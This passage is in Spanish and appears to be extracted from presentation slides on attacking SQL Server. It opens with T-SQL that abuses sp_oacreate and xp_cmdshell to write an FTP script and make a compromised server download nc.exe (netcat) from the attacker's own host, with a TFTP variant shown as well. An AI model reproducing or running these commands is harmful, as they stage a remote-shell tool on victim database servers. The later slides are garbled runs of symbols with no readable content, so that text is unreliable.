Creamos un archivo get.txt para utilizar luego ftp declare @o int, @f int, @t int, @ret int EXECUTE sp_oacreate 'scripting.filesystemobject', @o out EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:get.txt', 1 EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit' EXECUTE master.xp_cmdshell 'FTP -s c:get.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET c:mi_local_file c:remote_file'
  • 40. 3 ----- Extracto ------------------------------------------ :M& ) & ) " " ( " * " " )4 " . " " " 6 " " #0#$% # 6 & 6 " *=" " 9 " ) " . " " " 8 " " & " " Q + " Q 9 " " . " )4 :%8 " " * #$% # 6 E " 4 " . * "+" )4 F + " 7 " " " . )4 6 " ) " ; " Q . & c " & )4 M : ;! ; ` & < a ; " Q )4 M & ` & 6 : ;! ; a ` & ` V a ` : ;! ; a ` a a " 3 , + # ) " " " & 9 #0#$% " ) " " 9 " 7" " " "& ) 9 " . " " & " * " & 9 ) 4 .J 6 " " J " " ) " 7 " #$% 4 ! " 9 " D " + #$% 9 6 " ) " " " ) < " 6 & + = " ) " " " " ( " E: ) = " "IF & " + * " " " ) * " 6 " . & " " #$% + " 5 ) " * . >; : G ) 5 # + ! 4 > " " 7 . " " ) " " #$% 4 + " ) " " " " " 0 * # L 1;: : ;A %8L ' > > % + = " " + ) = " " J " " "
  •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
  • 42. 3 ! " " " . " . * . E, " 6 " ) " " " " . ( & M" ) * . F H * 9 6 " " " " " #0#$% # 6 8" ) ( " 6 . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . 6 " * " * E " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " . & " " " * " . " 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ) " " "A % B ! #0#$% # 6 " " & + " " ) " 7 " + 6 " " 6 " . " . " " " * " " " " . & 9 9 " ) " " " " " ) + + " ( " . 6 ( " " " " ) 4 " " " " " 6 " " " . ' " * & " " 9 . " 6 " " " 6 & < " " ) " " " " . + " " " " 9 + = " " " 6 " ) " & " ) < 7< " + " " 7 " M . " ) #0#$% # 6 8 " " " . "& " " + "* ( " " A " "& " " + # 6 " ! M" = & * . " " " 6 " ) " "& " . * " * 6 " " . G " & " ) " " 6 " " "& " " " " ) > .= " ) " . " . > + " " " " ) " " . & ) = 6 " #$% 4 . *= 4 # ) * " " & 74 " 6 " " * M . * " G " 8 " & " " " * "& " " " " " + " " " . * ) = " . " " " " 6 ) " 6 " E; " " #0#$%F 8" ) " " " " 9 " . " D " " . * ) " . ( # #;8 5 G "
  •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
  • 44. 33 M " " + . 1; " " #9 M ( M " " + . G "9 < M " " + . G "9 . ( M " " + + . ) 5 "0 0 @0) ( << " " " " * " " " M " " MQJ " + " ; " " B % ! ( 01 ( , :! " 9 " " )+ 1 0 " . II )+ 5 . 0' ' % . " " F )+ 6 0S " * " ) " " " ) "I )+ 5 . 59 = 6. & ** " * . & " " 9 " " = " * " " 6 = " " " " " " ( . 6 . (( # + ; & " . " > > < 1 ) 9 " * " 9 = = & + 9 " ) " " "& " * 9 . " " + 9 " < " ) " " " " " " ) " " ) 8 " . . & . ( " " " 6 " " " " D " 1 + 6 9 " "* ( " " " * . 9 " " ") ( " " " " * " ; ) 7 . " = + # 9 " " " " " #0#$%& . " " " " . / " 9 " 9 67" " " " " " + * " " " #$% 4 E8" . O1 < / # + # * % d " " " J "KF ! & . " " 9 " . " " " " " " " . * & < " 9 D 5 " >5 . ! >